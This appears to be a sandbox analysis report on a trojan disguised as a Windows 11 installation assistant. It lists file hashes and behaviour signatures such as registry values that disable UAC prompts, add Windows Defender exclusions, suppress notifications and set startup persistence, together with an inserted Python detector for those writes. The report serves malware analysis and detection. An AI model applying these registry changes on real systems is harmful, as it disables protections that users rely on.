| SHA512 | 13385b98377cb664907a5189cbf63f575c86b5b705df2a458ae21c6fd63f6cbf77451e8f17b22af8921a3342f31445278cb8450e1cc58fe33eecffe81e56cdda |
C:\Users\Admin\AppData\Local\Temp\3u4w4e8q.tmp
| MD5 | 31c5a8d7f0d900bfff09d437a7457478 |
| SHA1 | c32f7abbc47949c340a2136bb8cc4787f05b1eff |
| SHA256 | 89da44ebaa36a31740f9dbc585cefc3f55cf725f7d8d745b44ba259f0a1d8455 |
| SHA512 | 0089a7e5e0c3d7b8a226775f30983e901b323846d5263366672390ebbbd9212bd72bdb87c7baeeb09c6438317a66f5ccfc20cd898579190e6bb7579dd1cd158a |
C:\Users\Admin\AppData\Local\Temp\aut8B1A.tmp
| MD5 | bdb4dcbcec51d9ee1afee83221921fee |
| SHA1 | 21d56a9334238297d1a09aba46043cc36c9e2d3c |
| SHA256 | 9e5d8505b986e40cce00707180334fead34c0c3b590c458305de89e4bbc85f75 |
| SHA512 | cad20e6355cfe1e42a4ee7f5350a033ec79b8ed2689d8c6fa11bb1c3ae2a99425f03d95312ed9daf5c2543fc7ce38239fca41700cbecbc02a007a669ffd81fa5 |
C:\Users\Admin\AppData\Local\Temp\aut8B19.tmp
| MD5 | c87a407a6decc862e3132efc8ab504c9 |
| SHA1 | 20cd713fa491119aabfd25a7cce7a8209098f903 |
| SHA256 | 439de9f662754bbcfc211658ce3f1c1730e85df199ed1e067940e28831d2c758 |
| SHA512 | 8bed0ca582ca5b46f0c6922995343388df0d84d063512308d3f58c31da1811cb2c47b87be0ce5de4a1fb8ce14f89f8f3197f31bb0ca989fa159514f6751e1832 |
C:\Users\Admin\AppData\Local\Temp\aut8B2B.tmp
| MD5 | 3886aae8ae30f288363ce4d2ac4f81c2 |
| SHA1 | 19441c886b57ed9f4650f614f0d93501d0a33e40 |
| SHA256 | 37f10f3d46a2886cac6169a398e91dd8cd0cfd06a7b6812e1afb68c4c031b9fd |
| SHA512 | b37aa26a5324723d9b8a7b919c3727565a1e1974ba1316093b59dbe4a75f5e0773288894d7abb403d65688e0e3f29ef4b48af7a8048e64fe36199bf8d371fb31 |
C:\Users\Admin\AppData\Local\Temp\2z3k7c2q.tmp
| MD5 | c857a930b241455b7961a16c96ddf256 |
| SHA1 | 40f6df790dc7bc1e7daa1f48a729453a2ffd9efa |
| SHA256 | b2023c405900d194c0a00ea1cabefa96f3abcb73c2da88c3802594811a128bbc |
| SHA512 | 702b4c9327cddd5d8baac050376143e42ac4632afb0e1b605a0d3a7d448a9f570296981b509f66cab56926a6c52bb8fd90b6014a89d433e3b8f41396b6fe7bcb |
memory/1092-486-0x0000000000400000-0x00000000004E3000-memory.dmp
memory/244-488-0x0000000000400000-0x000000000071D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr
| MD5 | e9f5799bcca4695afee82c0781242577 |
| SHA1 | 240bf1ae93f432aef2a05daeed3299d12bd7e6f8 |
| SHA256 | dc24023611f63b84f4fddc095a1417518ae1972743dbbff014d31218770e48d6 |
| SHA512 | b1551197efd2209b633ed0ca581332a1871416a541a64ef99dffd75c7a082b65c4fa3abdc15b84ff92cdac224c6616a40c17b33c268df3f6244f0b2c920b143c |
memory/5064-493-0x0000000000400000-0x00000000006A8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\.cmd
| MD5 | 6f0d036f6681bac6fd742591ddc62808 |
| SHA1 | 2e518c19ec29b7a3a69cd9d4c120d3b88d71102b |
| SHA256 | ce8f0822d428e39157fc6ed433b8da7fa7ce62ece2c73bed9930d50f7cb41f24 |
| SHA512 | 8aeb47d8a15ab62a1a6e23f93a916f361703d2ac64a302d2364d40de016dc2167d653ca905197d81e4c578fdbb81eb88a22c7cd81abe08756ec86dda6a44aaf6 |
memory/244-498-0x0000000000400000-0x000000000071D000-memory.dmp
memory/5064-499-0x0000000000400000-0x00000000006A8000-memory.dmp
memory/1092-502-0x0000000000400000-0x00000000004E3000-memory.dmp
memory/5064-505-0x0000000000400000-0x00000000006A8000-memory.dmp
memory/3788-506-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/5064-511-0x0000000000400000-0x00000000006A8000-memory.dmp
memory/3788-509-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/3788-512-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/3788-513-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/3788-510-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/3788-508-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/3788-515-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/3788-516-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/3788-517-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/3788-514-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\write.zip
| MD5 | ccdde9cc37916d92365eca66f652c422 |
| SHA1 | 4a5ac27e151f695bb2c3db1d81484fb4d22c6e88 |
| SHA256 | 6e0b8d11701537039d645d93e5668e4707d8405310ff84b453f533e60b8b0ad9 |
| SHA512 | 8f416c23545d144a4b5d0796a41b3ec7c9a228d782cab0d105cfdeb1e163f2e865c62392dcc2cac5444bb54e5db7228a903b4de8ce9c9bf0cf2eba2a9be20d9a |
memory/3788-546-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/3788-547-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/3788-548-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/3788-550-0x0000000011000000-0x0000000011158000-memory.dmp
memory/3788-551-0x0000000003310000-0x00000000033B7000-memory.dmp
memory/2072-555-0x0000015EBD850000-0x0000015EBD872000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hpga2sz0.3qt.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3788-566-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/3788-567-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | e6715c0ab4c24c5abc960a22692aef15 |
| SHA1 | a561bdf85293e36f512d8748c5dc8d585922b423 |
| SHA256 | 1b813abfe6905cda42a9231b4ebc20eda99ee2d6b7cee3e357104be0493a915d |
| SHA512 | eb4222cf1b14a011649b58d5687cb77248021f5fd57c72e83dd98bea30ecb20f97e6fd27ceb44928a0396669f599e3f781101d553c1107497987435cab51fca0 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 93cdbe0e6c1df80fa22c120f8c69b8c6 |
| SHA1 | bd436c9dc25544376b12551f49d2084197f38119 |
| SHA256 | 0b2f5bb87372b51ebb75c4b6f9662e1dec0cbec909ff537348a3af4faa506e71 |
| SHA512 | 94d8baa7f32fe19541f92dd285293aed06d512554b5d3a01f728f933572bf5af84f028f2fd0e27f9101d0f7f08c10bfac80beb5996e3f1177a5b98803d238fe7 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 88dc70c361a22feac57b031dd9c1f02f |
| SHA1 | a9b4732260c2a323750022a73480f229ce25d46d |
| SHA256 | 43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59 |
| SHA512 | 19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0ac871344dc49ae49f13f0f88acb4868 |
| SHA1 | 5a073862375c7e79255bb0eab32c635b57a77f98 |
| SHA256 | 688f15b59a784f6f4c62554f00b5d0840d1489cef989c18126c70dfee0806d37 |
| SHA512 | ace5c50303bd27998607cf34ac4322bcf5edfbd19bbb24309acf4d037b6f3f7636c7c14b6ac0b924114e036252d3a1b998951c7068f41548728fa5d92f5f9006 |
memory/3788-585-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | a64e2bf847968c3ebb0352d94ebc31bb |
| SHA1 | 4393503722001bacc9e530563fb6df1a1fa2290d |
| SHA256 | 7ea0c8928258bff6059853248fcd29e072164ae919bd212836071068a667d884 |
| SHA512 | 54a60607f0fbc938c6cf3da171c18089c1465f1ccee30d97b352a6799f6417f4fa088fd8eda45e06037bf62cdeef707d72da1073e57b5883b3b4acb7705dfb5e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a28c02af6cefdbe36e78dcef7d28174e |
| SHA1 | 229da39044752b3c6d8ff548dafd0b45bfec4046 |
| SHA256 | 45223a4f7f19aa9fb5fcc63c2f1e7363e2e9226817b5ef2b30f0f1a869a1db0a |
| SHA512 | 99a16b83b9a514ededcd30dd1135cf43ec418cb145161fdbba8c7319e4d70dfa9a2c44180215f6f859e0345901103f5517f4543f59e6e949cdb057c672020661 |
C:\Users\Admin\AppData\Local\Temp\irf37rj215240672703.tmp
| MD5 | 9025ce192ba676569c935459d0e1e249 |
| SHA1 | 1c9754ccf27e5bcf4bf4d1fb55e5485c12008d31 |
| SHA256 | d499f5213314049a8f8a628dcccb550758a8bd25639bd7c05e776c4ff7692c0c |
| SHA512 | 7de59dd50602e05f301ee84539a93a61c49ab26ac3946756414529414e23ffb46d9b2fda64c3a43e712e7b75ee5fe6b6a4e4847931dda5cac206948c8ac989a9 |
C:\Users\Admin\AppData\Local\Temp\0pg7b8xtdpt240672703.tmp
| MD5 | 8566283dfca310d83f7a01ea331b2b45 |
| SHA1 | bec1230578a4d4868dea90cfa0ee164d6b9a6359 |
| SHA256 | 792739bc125102e5f41e3e8201e01c5c93fd9c974cd822223b05c4aa69fab8b1 |
| SHA512 | a2d3a49fff50a685c1d9bd041037f98c8e3b1f72c12bfb245716f845b2049c0304c8f3c648ec4077bd0da01aa1b6cba1921e3dfd1d7f1d66b53748e5c28b54c9 |
memory/3788-609-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\13s111wjws4240672703.tmp
| MD5 | eeba08205e37c96d0cd827c4c52fa1ee |
| SHA1 | e613d220aa3ee59f244eeb3c3168712ce2d03ad2 |
| SHA256 | c6c7eb15ef41404fbd3db5ca99cbeb52da54cb6d0c8d05e4abbb31afe103693a |
| SHA512 | 796951952ad013868cbcc160e51e05888fb1c61a9a8781849733db058ac251a09eb892d163aedb3b8c897b19d56d4257ddaab0608493b4d5257f16d3e1e1e71a |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 85ae502287d00cd1c8c2f8a647e8a443 |
| SHA1 | f6b415dcdd8f0769657b7c4415f51df6bdb714d0 |
| SHA256 | 52b985751035f16bfe48694eb912e5e5094fb294b3e89ebd6bd502115ba3e098 |
| SHA512 | 854a211a60d9b0004e9b8e2b1d2a9d91ec1d276e2c1898f5b73b24571476d0568f6a322548fdea74fc52fbe503d0dfc886764151bf3dfcf47bf28710e1a71189 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 558251ab9bc9c2e10e44975a894657a5 |
| SHA1 | 7e6272db305c4da30b8ce063274bde520f0b4a92 |
| SHA256 | ef8a4bd0c8abbb6dd921e1c04c7e5b54eaca2079f8ae5eaed3f9db7ec9de43e4 |
| SHA512 | 239a85d42c6546dc28bb7c76b448632a959695b64045baaef6abd83a5246884adba715b74cc1debe4ff126c838a36b4fe10eb2bc080f0957d421f3e932310ecf |
C:\Users\Admin\AppData\Local\Temp\iv06ldrfve1q240678812.tmp
| MD5 | 40f3eb83cc9d4cdb0ad82bd5ff2fb824 |
| SHA1 | d6582ba879235049134fa9a351ca8f0f785d8835 |
| SHA256 | cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0 |
| SHA512 | cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | cc01fedd976dca806b8041b28d58b1a2 |
| SHA1 | 6ef20eef3325384fac647495b4d24d9402496de2 |
| SHA256 | fbefbe77b5d69d8a45d63019d2f2d92f149ca5a07dcaf4a61041f20a5df740f3 |
| SHA512 | bc910406d58bf6cc9598e1505b498d4286398492d4a51eff12028f615ceb5b6da0c0dafb10ad3136be698f60397d607011d2cc2577774bda7f359095ee4a5b6e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c4273f170169bb353809542b107cbd85 |
| SHA1 | 1dc690ec9521c5aded719c7925d428271eeb2706 |
| SHA256 | b3efd6f2403ed3b19c8e7488b272bd2d024fe64d1ada4e5e22a2041fa66157f4 |
| SHA512 | 9a23e0d07db1f8ca882ffe6b669bb2814a3f19b148d7a27b9c1f4e139be76bf81ceae73714d0e43e397c463265b58bbe411be662f50f1f96a081229ca378d6fc |
memory/3788-649-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 1929a30a273d0d72ef691ae9aae56a19 |
| SHA1 | e4013eda41e58edddfe1e3e18edac6c5304bbc16 |
| SHA256 | faf9b0285dc23812a65bd084a1c1d42f55000af735c47a9061225d7f6e5bdf40 |
| SHA512 | 2f435fd851f8e530facd65770fdc3e374f7788dfa758c832eb8b5176e792ec01c32ac3371b27c3b45b368c1b438b56e2b6b94a3e34bb5e3e6e8216e41f63a31f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e5c112cd94bf70f4ed28f38c1f7f77ea |
| SHA1 | 57166a77f586d69bb20f73010b4cebc096ae547e |
| SHA256 | 50b37805575f20df2ffb5db5155c897a5c80d043dd845c7f441938bedbd3927c |
| SHA512 | b38ab000f245e76280a358f1020203df3cd9877e750f94bfcb8966129ebee328e4f625b2fb3592ef449d9fd05f4213d597bed175bbcc2c76fa54e28acebe3800 |
memory/3788-666-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | dbd0e73e9d56cf55a65703804237b8bd |
| SHA1 | fc8147a150a3490caf474bb4f6be1dedd9244d21 |
| SHA256 | 3a72a71088fd433709bd04feac6870bad7ea419226245d60606c47a20318333c |
| SHA512 | 0404671c29cfedf3599eb11ea5c512a9b5fa81a36cde4cc58766c15af0f8854dccb8abd2d7351a6d4e4bf00910175ce250158e76cbb08163e178224ea2d8882d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 10254f48b63b60ae6245903153592e48 |
| SHA1 | 2c300d1c60c50e8896705022bc402c423681f40a |
| SHA256 | b3778ffb5260878714023fd1abc70c4e850b5397c2b32a3975b1ff28bfd96c69 |
| SHA512 | 6a7e7844c47a07bc8fd0b59267f0d1bac460f672ada93131edd65ca2eb33159de9f6291a1acde745f32991b364e9ceac697f2dfcf1a2696b51a9120dd7af77d4 |
memory/3788-686-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\lbuwut6e1qq0lobf8g9m5vg5.tmp
| MD5 | 6e385672eb1a43fbb98a999a115aef59 |
| SHA1 | 8fd6499f2f2f847b6e104793bd5c5267e83d5855 |
| SHA256 | c7f9605f9bb601c465d5f3ad7e82f310a3dc2530b51c079f2df12f6b54f34f84 |
| SHA512 | 73ddf9eccda70dc366631a1098766b418f39749bd0259ccb5d06939ec111a1440f7c164007f13bde92d7f9f3b83625d06919e2423da29797bbdc6e79d0f45a9e |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | a95ab0f52da4fea8d2fc07dc1424e3b3 |
| SHA1 | b2530fc1aa315b043f433b16d4800ed3c0f48c9b |
| SHA256 | be08ce5442138a4858625a8506272c11ce0306f0b3d1a107755ee1037dd2bed7 |
| SHA512 | 21dc3eadf72ee06551c0c6501ff68d56eca5a3c96a47d9fe769da117ca3a911ddfc4c6abe8f6ac5d5683239fffeb15038431c40a9e2dd7736699b0477d1b8b57 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 44ffe2bf9342f010ab716e7b0def477a |
| SHA1 | 220883a35211c91579d3f5fcbae518c4aa4805a6 |
| SHA256 | 1ece58e560f9d2d7abb644ab12234b102c9dffc4a18ee5fb4f62218f9a906d0b |
| SHA512 | 0f261fdc66074e14ee2b89b67354fd79b568380697fbb1743acd61f4d013c9652f8217a36d7763fde3edb4aad4b803f17b8939771ec9e12f3ba87841c6ae4ba1 |
memory/3788-712-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/3788-732-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 29ea5a6dcf77dce7c49b0e4024ca405f |
| SHA1 | 74f244738fa71dc8277335df818e948783edd5ae |
| SHA256 | 6a15d52ff448326ab9b290e60c80262af118f5b5bb3b34349b9dca1f3ac45e58 |
| SHA512 | 0b50b0278c92e549110afedfc968db74b281efe78e3684c56d72bf609b7fed7c6d48b296d5b9706e5540268e1967b20677c274adc21171f9e1de1c4fff90b37c |
memory/3788-755-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/3788-757-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/3788-767-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1116-772-0x0000000002E30000-0x0000000002E66000-memory.dmp
memory/1116-773-0x0000000005530000-0x0000000005B5A000-memory.dmp
memory/1116-774-0x0000000005460000-0x0000000005482000-memory.dmp
memory/1116-775-0x0000000005C50000-0x0000000005CB6000-memory.dmp
memory/1116-776-0x0000000005CC0000-0x0000000005D26000-memory.dmp
memory/1116-785-0x0000000005D30000-0x0000000006087000-memory.dmp
memory/1116-786-0x00000000061E0000-0x00000000061FE000-memory.dmp
memory/1116-787-0x0000000006220000-0x000000000626C000-memory.dmp
memory/1116-788-0x0000000007380000-0x0000000007416000-memory.dmp
memory/1116-789-0x00000000066E0000-0x00000000066FA000-memory.dmp
memory/1116-790-0x0000000006730000-0x0000000006752000-memory.dmp
memory/1116-791-0x00000000079D0000-0x0000000007F76000-memory.dmp
memory/3788-809-0x0000000000400000-0x0000000000AE1000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-14 23:57
Reported
2024-11-14 23:58
Platform
win7-20240903-en
Max time kernel
29s
Max time network
34s
Command Line
Signatures
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\WIndoWs defender sECuritY centEr\notIFICATions | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\WIndoWs defender sECuritY centEr\notIFICATions\dIsablEEnhAncEdnOtiFiCatiOns = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\sOFTwAre\micrOsOfT\WIndoWs defender sECuritY centEr\notIFICATions | C:\Windows\system32\reg.exe | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsEnTPromptbehavIOrUser = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromPTOnsECUredesKtoP = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsenTPrompTbEhAvIoradmin = "0" | C:\Windows\system32\reg.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\SCr = "0" | C:\Windows\system32\rEG.EXE | N/A |
| Key created | \REGISTRY\MACHINE\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns | C:\Windows\system32\rEg.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\Cmd = "0" | C:\Windows\system32\rEg.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns | C:\Windows\system32\rEg.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\EXE = "0" | C:\Windows\system32\rEg.EXE | N/A |
| Key created | \REGISTRY\MACHINE\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs | C:\Windows\system32\rEG.EXE | N/A |
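The registry indicators in the three tables above are written with randomised letter case (`WIndoWs defender sECuritY centEr`, `COnsenTPrompTbEhAvIoradmin`), which defeats case-sensitive string matching while having no effect on the registry itself, since key and value names are case-insensitive. The checker below is an added example for this report, not code from the sample or the sandbox. It canonicalises the native `\REGISTRY\MACHINE` paths, then flags the specific writes seen here: the three UAC policy values set to 0, the Defender `Exclusions\Extensions` values (for which the data is irrelevant; the presence of the value is the exclusion), and `DisableEnhancedNotifications = 1`. The event list is constructed from the rows in this report plus one benign control row; on a live host the same function would be fed parsed `reg query` output (an assumed integration, not shown).

```python
"""Flag registry writes that weaken UAC or Windows Defender, tolerant of case games."""
from __future__ import annotations
import re

# "<key> = "<data>"" for value writes, bare "<key>" for key creation, as in the report.
INDICATOR_RE = re.compile(r'^(?P<key>[^=]+?)(?: = "(?P<data>[^"]*)")?$')

POLICIES = "hklm\\software\\microsoft\\windows\\currentversion\\policies\\system"
DEFENDER_EXCL = "hklm\\software\\microsoft\\windows defender\\exclusions\\"
DEFENDER_NOTIF = "hklm\\software\\microsoft\\windows defender security center\\notifications"

# (canonical parent key, value name, dangerous data) -> finding text
VALUE_RULES = {
    (POLICIES, "consentpromptbehavioradmin", "0"): "UAC: administrators elevate without any prompt",
    (POLICIES, "promptonsecuredesktop", "0"): "UAC: consent prompt no longer shown on the secure desktop",
    (POLICIES, "consentpromptbehavioruser", "0"): "UAC: standard-user elevation requests silently denied",
    (DEFENDER_NOTIF, "disableenhancednotifications", "1"): "Defender: enhanced notifications suppressed",
}

# Constructed from the signature tables in this report; the last row is a benign control.
SAMPLE_EVENTS = [
    ("Set value (int)", r'\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsEnTPromptbehavIOrUser = "0"'),
    ("Set value (int)", r'\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromPTOnsECUredesKtoP = "0"'),
    ("Set value (int)", r'\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsenTPrompTbEhAvIoradmin = "0"'),
    ("Key created", r'\REGISTRY\MACHINE\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns'),
    ("Set value (int)", r'\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\SCr = "0"'),
    ("Set value (int)", r'\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\EXE = "0"'),
    ("Set value (int)", r'\REGISTRY\MACHINE\SOFTWARE\Microsoft\WIndoWs defender sECuritY centEr\notIFICATions\dIsablEEnhAncEdnOtiFiCatiOns = "1"'),
    ("Set value (int)", r'\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1"'),
]


def canonical(key: str) -> str:
    """Lower-case the path and map the native hive prefixes to HKLM/HKU."""
    k = key.strip().lower().replace("/", "\\")
    for native, hive in (("\\registry\\machine\\", "hklm\\"), ("\\registry\\user\\", "hku\\")):
        if k.startswith(native):
            k = hive + k[len(native):]
    return k


def evaluate(events) -> list[tuple[str, str]]:
    """events: iterable of (description, indicator) as in the report's tables.

    Returns (original indicator, finding) pairs for every row that matches a rule."""
    findings = []
    for desc, indicator in events:
        m = INDICATOR_RE.match(indicator.strip())
        if not m:
            continue
        path, data = canonical(m.group("key")), m.group("data")
        kind = desc.lower()
        if kind.startswith("set value") and data is not None:
            parent, _, name = path.rpartition("\\")
            msg = VALUE_RULES.get((parent, name, data))
            if msg:
                findings.append((indicator, msg))
            elif parent.startswith(DEFENDER_EXCL):
                # extensions | paths | processes; the data value does not matter here
                category = parent[len(DEFENDER_EXCL):]
                findings.append((indicator, f"Defender: {category} exclusion added for '{name}'"))
        elif kind.startswith("key created") and path.startswith(DEFENDER_EXCL):
            findings.append((indicator, "Defender: exclusion key created"))
    return findings


if __name__ == "__main__":
    for indicator, msg in evaluate(SAMPLE_EVENTS):
        print(f"{msg:60} <- {indicator}")
```

The `EnableLUA = "1"` control row produces no finding, which is the point of matching on (key, value, data) triples rather than on substrings: `ConsentPromptBehaviorAdmin = "5"` is the default and must not fire, while the same value set to `0` must. Extending `VALUE_RULES` with the `DisableAntiSpyware`-style values is straightforward if a later detonation shows them.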
Deletes shadow copies
Disables use of System Restore points
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\drivers\etc\hosts | C:\Windows\System32\cmd.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows11InstallationAssistant.lnk | C:\Users\Admin\AppData\Local\Temp\is-MKHMM.tmp\Trojan.Win32.DelShad.tmp | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-MKHMM.tmp\Trojan.Win32.DelShad.tmp | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-MKHMM.tmp\Trojan.Win32.DelShad.tmp | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 980 set thread context of 1312 | N/A | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Logs\CBS\CbsPersist_20241114235820.cab | C:\Windows\system32\makecab.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-M7KKU.tmp\Trojan.Win32.DelShad.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
